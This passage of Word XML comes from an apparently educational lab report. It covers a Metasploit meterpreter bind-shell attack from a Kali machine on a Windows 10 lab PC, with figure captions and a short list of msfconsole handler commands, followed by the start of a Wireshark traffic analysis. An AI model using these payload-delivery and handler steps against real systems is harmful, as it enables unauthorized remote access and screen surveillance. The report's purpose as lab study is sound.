            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="114593045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24245B" w14:textId="224F82E3" w:rsidR="00DF4831" w:rsidRDefault="003D5578" w:rsidP="003D5578">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc150072421"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="009D54B9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> - Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> meterpreter to generate the bind shell payload</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidR="006D2E43">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C07C3D6" w14:textId="77777777" w:rsidR="00DF4831" w:rsidRDefault="00DF4831" w:rsidP="0074040B"/>
    <w:p w14:paraId="21CF23F7" w14:textId="77777777" w:rsidR="003D5578" w:rsidRDefault="00E517F5" w:rsidP="003D5578">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FD0CDC6" wp14:editId="6481D857">
            <wp:extent cx="5731510" cy="2349500"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="882158847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158847" name="Picture 1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4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8AF8EA" w14:textId="26478F41" w:rsidR="009864AC" w:rsidRDefault="003D5578" w:rsidP="003D5578">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc150072422"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="009D54B9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> - Confirming that the bind.exe payload has been created and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>is located in</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the temp working folder</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidR="006D2E43">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC9B1BF" w14:textId="77777777" w:rsidR="00E517F5" w:rsidRDefault="00E517F5" w:rsidP="0074040B"/>
    <w:p w14:paraId="3F8AF36E" w14:textId="77777777" w:rsidR="003D5578" w:rsidRDefault="0067245A" w:rsidP="003D5578">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C7B0754" wp14:editId="172B6415">
            <wp:extent cx="4997450" cy="723900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="826681129" name="Picture 12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6681129" name="Picture 12" descr="A black background with whit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74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031DCE" w14:textId="5745A7EA" w:rsidR="00E517F5" w:rsidRDefault="003D5578" w:rsidP="003D5578">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc150072423"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="009D54B9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> - Running the http server on the Kali attack PC in the temp folder</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidR="006D2E43">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246C7D5B" w14:textId="77777777" w:rsidR="0067245A" w:rsidRDefault="0067245A" w:rsidP="0074040B"/>
    <w:p w14:paraId="4353D95F" w14:textId="77777777" w:rsidR="003D5578" w:rsidRDefault="0067245A" w:rsidP="003D5578">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="198D4CAD" wp14:editId="7C833673">
            <wp:extent cx="5731510" cy="2806700"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="726956635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6956635" name="Picture 1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0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40C1AC" w14:textId="4CB488A5" w:rsidR="0067245A" w:rsidRDefault="003D5578" w:rsidP="003D5578">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc150072424"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="009D54B9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> - On the Windows 10 PC - Browsing to the Kali attack PC on Port 8080</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidR="00885C1C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB0F111" w14:textId="77777777" w:rsidR="0067245A" w:rsidRDefault="0067245A" w:rsidP="0074040B"/>
    <w:p w14:paraId="10DD4689" w14:textId="77777777" w:rsidR="00FA12AF" w:rsidRDefault="0067245A" w:rsidP="00FA12AF">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B7CCB39" wp14:editId="4F168369">
            <wp:extent cx="5731510" cy="1325880"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="134648465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648465" name="Picture 1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25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CBC4CD" w14:textId="566762C9" w:rsidR="0067245A" w:rsidRDefault="00FA12AF" w:rsidP="00FA12AF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc150072425"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="009D54B9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> - Windows 10 Microsoft Defender warning that the file may not be safe and to ensure that it is trusted before </w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidR="006D2E43">
        <w:t>opening.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E659B62" w14:textId="77777777" w:rsidR="00FA12AF" w:rsidRDefault="000712C4" w:rsidP="00FA12AF">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F9C9667" wp14:editId="7889C753">
            <wp:extent cx="2762250" cy="2150185"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="2035190471" name="Picture 15" descr="A screenshot of a computer err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5190471" name="Picture 15" descr="A screenshot of a computer err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8311" cy="21549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E70BB1" w14:textId="16C724D0" w:rsidR="000712C4" w:rsidRDefault="00FA12AF" w:rsidP="00FA12AF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc150072426"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="009D54B9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> - Once again Microsoft Defender blocking the bind.exe shell from </w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidR="006D2E43">
        <w:t>running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FCF128" w14:textId="77777777" w:rsidR="000712C4" w:rsidRDefault="000712C4" w:rsidP="0074040B"/>
    <w:p w14:paraId="7131E556" w14:textId="77777777" w:rsidR="00887306" w:rsidRDefault="000712C4" w:rsidP="00887306">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="768B64FE" wp14:editId="59CEF58D">
            <wp:extent cx="5731510" cy="3312795"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="1031174455" name="Picture 16" descr="A computer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1174455" name="Picture 16" descr="A computer screen with whit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12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8FE02A" w14:textId="77777777" w:rsidR="00B24D47" w:rsidRDefault="00B24D47" w:rsidP="00887306">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19237469" w14:textId="08DB9B7D" w:rsidR="000712C4" w:rsidRDefault="00887306" w:rsidP="00887306">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc150072427"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="009D54B9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> - On the Kali PC - the HTTP log showing the bind.exe file being downloaded.  It took a few attempts!</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="627017EC" w14:textId="77777777" w:rsidR="001B57F7" w:rsidRDefault="001B57F7" w:rsidP="0074040B"/>
    <w:p w14:paraId="02E0263E" w14:textId="77777777" w:rsidR="00E16CFB" w:rsidRDefault="001B57F7" w:rsidP="00E16CFB">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="012FBA66" wp14:editId="52A96D2C">
            <wp:extent cx="5731510" cy="5511165"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2020765901" name="Picture 17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765901" name="Picture 17" descr="A screen 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511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14E64A" w14:textId="0730E270" w:rsidR="001B57F7" w:rsidRDefault="00E16CFB" w:rsidP="00E16CFB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc150072428"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="009D54B9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> - Running the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mfsconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. This lab was carried out on Halloween, and therefore the reference to the Mummy.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="0B4EA2C6" w14:textId="77777777" w:rsidR="00285F32" w:rsidRDefault="00285F32" w:rsidP="0074040B"/>
    <w:p w14:paraId="7A1644D3" w14:textId="1A8CF650" w:rsidR="00285F32" w:rsidRDefault="00A75894" w:rsidP="004E373C">
      <w:r>
        <w:t xml:space="preserve">Apologies, </w:t>
      </w:r>
      <w:r w:rsidR="00161DF2">
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> screenshot of the </w:t>
      </w:r>
      <w:r w:rsidR="00527048">
        <w:t xml:space="preserve">original </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00527048">
        <w:t>mfsconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00527048">
        <w:t xml:space="preserve"> commands being applied</w:t>
      </w:r>
      <w:r w:rsidR="002744D4">
        <w:t xml:space="preserve"> seem to have been lost</w:t>
      </w:r>
      <w:r w:rsidR="00527048">
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="00F90D16">
        <w:t xml:space="preserve">Please find the commands that were used during this section of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004E373C">
        <w:t>labwork</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004E373C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF1559E" w14:textId="2F8B395E" w:rsidR="00112852" w:rsidRDefault="00112852" w:rsidP="00151656">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6E6E4F" w14:textId="77777777" w:rsidR="00112852" w:rsidRDefault="00112852" w:rsidP="00151656">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>msf6 &gt; use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668A9ED2" w14:textId="77777777" w:rsidR="00112852" w:rsidRDefault="00112852" w:rsidP="00151656">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>msf6 exploit(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>multihandler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) &gt; set payload windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterperter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bind_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6EFBBB1F" w14:textId="77777777" w:rsidR="00112852" w:rsidRDefault="00112852" w:rsidP="00151656">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>msf6 exploit(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>multihandler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) &gt; set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 10.0.2.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A46967D" w14:textId="77777777" w:rsidR="00112852" w:rsidRDefault="00112852" w:rsidP="00151656">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>msf6 exploit(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>multihandler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) &gt; set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11080790" w14:textId="77777777" w:rsidR="00112852" w:rsidRDefault="00112852" w:rsidP="00151656">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEE6B1B" w14:textId="77777777" w:rsidR="00285F32" w:rsidRDefault="00285F32" w:rsidP="0074040B"/>
    <w:p w14:paraId="634A8DEA" w14:textId="77777777" w:rsidR="00285F32" w:rsidRDefault="00285F32" w:rsidP="0074040B"/>
    <w:p w14:paraId="4EFDDEF2" w14:textId="77777777" w:rsidR="00285F32" w:rsidRDefault="00285F32" w:rsidP="0074040B"/>
    <w:p w14:paraId="4BE50D05" w14:textId="77777777" w:rsidR="00FF3EB3" w:rsidRDefault="00285F32" w:rsidP="00FF3EB3">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CDD100A" wp14:editId="50889AD8">
            <wp:extent cx="4565650" cy="1454150"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1581227450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227450" name="Picture 19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5650" cy="145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5A3FD5" w14:textId="636D900F" w:rsidR="00285F32" w:rsidRDefault="00FF3EB3" w:rsidP="00FF3EB3">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc150072429"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="009D54B9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> - Scr</w:t>
      </w:r>
      <w:r w:rsidR="002744D4">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">enshare being set up via the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>mfsconsole</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6E225016" w14:textId="77777777" w:rsidR="00285F32" w:rsidRDefault="00285F32" w:rsidP="0074040B"/>
    <w:p w14:paraId="763892CF" w14:textId="77777777" w:rsidR="00D847F6" w:rsidRDefault="001B57F7" w:rsidP="00D847F6">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F30A832" wp14:editId="0A11F975">
            <wp:extent cx="5731510" cy="3498215"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="1325595106" name="Picture 18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5595106" name="Picture 18" descr="A computer screen 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98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6FEAB" w14:textId="44EAFB7B" w:rsidR="001B57F7" w:rsidRDefault="00D847F6" w:rsidP="00D847F6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc150072430"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="009D54B9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>14</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> - Screenshare in action - the Windows 10 PC desktop is visible from the Kali attack PC</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidR="00885C1C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5047937E" w14:textId="77777777" w:rsidR="00C53358" w:rsidRDefault="00C53358" w:rsidP="00C53358"/>
    <w:p w14:paraId="38CD6B35" w14:textId="77777777" w:rsidR="00C53358" w:rsidRDefault="00C53358" w:rsidP="00C53358"/>
    <w:p w14:paraId="1CA3BC6E" w14:textId="77777777" w:rsidR="00C53358" w:rsidRDefault="00C53358" w:rsidP="00C53358"/>
    <w:p w14:paraId="6DD274EC" w14:textId="77777777" w:rsidR="00C53358" w:rsidRDefault="00C53358" w:rsidP="00C53358"/>
    <w:p w14:paraId="4F88A4E6" w14:textId="77777777" w:rsidR="00C53358" w:rsidRDefault="00C53358" w:rsidP="00C53358"/>
    <w:p w14:paraId="327830CD" w14:textId="77777777" w:rsidR="00C53358" w:rsidRDefault="00C53358" w:rsidP="00C53358"/>
    <w:p w14:paraId="1CDF6ED1" w14:textId="77777777" w:rsidR="00C53358" w:rsidRDefault="00C53358" w:rsidP="00C53358"/>
    <w:p w14:paraId="34B20DA2" w14:textId="77777777" w:rsidR="00C53358" w:rsidRDefault="00C53358" w:rsidP="00C53358"/>
    <w:p w14:paraId="007B9078" w14:textId="77777777" w:rsidR="00C53358" w:rsidRDefault="00C53358" w:rsidP="00C53358"/>
    <w:p w14:paraId="3880ABC2" w14:textId="4980385F" w:rsidR="005016FE" w:rsidRPr="005016FE" w:rsidRDefault="005016FE" w:rsidP="005016FE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Analysis of the Bind Shell Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6297A5" w14:textId="77777777" w:rsidR="00383B7C" w:rsidRPr="00F651C8" w:rsidRDefault="00383B7C" w:rsidP="00383B7C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D6078D3" w14:textId="0A315A75" w:rsidR="00383B7C" w:rsidRPr="00F651C8" w:rsidRDefault="002744D4" w:rsidP="00796962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below a</w:t>
      </w:r>
      <w:r w:rsidR="00C53358">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">nalysis </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="00C53358">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">as carried out from Wireshark captures carried out </w:t>
      </w:r>
      <w:r w:rsidR="00115AB0">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">during the attack on both the Kali Attack PC and the Windows 10 </w:t>
      </w:r>
      <w:r w:rsidR="00E97BCB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00115AB0">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>arget PC.  The results of which can be found below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1907EF13" w14:textId="77777777" w:rsidR="00383B7C" w:rsidRDefault="00383B7C" w:rsidP="00383B7C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BDBC707" w14:textId="00DFFA01" w:rsidR="00115AB0" w:rsidRDefault="00115AB0" w:rsidP="00115AB0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8.1 Analysis from the perspective of the Kali attack PC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F7AC03" w14:textId="77777777" w:rsidR="00115AB0" w:rsidRDefault="00115AB0" w:rsidP="00115AB0"/>
    <w:p w14:paraId="56FD6E04" w14:textId="107657C5" w:rsidR="001C584A" w:rsidRDefault="004547F0" w:rsidP="001C584A">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="004547F0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2711EB6C" wp14:editId="551C33C0">
            <wp:extent cx="5731510" cy="755015"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="8029720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2972062" name="Picture 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5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9E18C3" w14:textId="1C1F25B3" w:rsidR="00115AB0" w:rsidRPr="00115AB0" w:rsidRDefault="001C584A" w:rsidP="001C584A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc150072431"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="009D54B9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> - The initial </w:t>
      </w:r>
      <w:r w:rsidR="00885C1C">
        <w:t>3-way</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> handshake being carried out - initiated by the Kali Attack PC on port 38891 to port 4444 on the Target PC</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidR="00885C1C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D47047" w14:textId="77777777" w:rsidR="00115AB0" w:rsidRDefault="00115AB0" w:rsidP="00383B7C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47E424B8" w14:textId="77777777" w:rsidR="00707A48" w:rsidRDefault="003A0404" w:rsidP="00707A48">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="003A0404">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22B9304E" wp14:editId="46AEAD51">
            <wp:extent cx="5731510" cy="1262380"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="66219669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196691" name="Picture 1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62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DB5F9F" w14:textId="71F5F780" w:rsidR="003A0404" w:rsidRDefault="00707A48" w:rsidP="00707A48">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc150072432"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="009D54B9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> - Constant stream of traffic between the two PCs, windows size increases to 2102272</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidR="00885C1C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A89C57B" w14:textId="77777777" w:rsidR="00115AB0" w:rsidRDefault="00115AB0" w:rsidP="00383B7C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52E8DA8F" w14:textId="77777777" w:rsidR="007441F5" w:rsidRDefault="007441F5" w:rsidP="007441F5">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="007441F5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
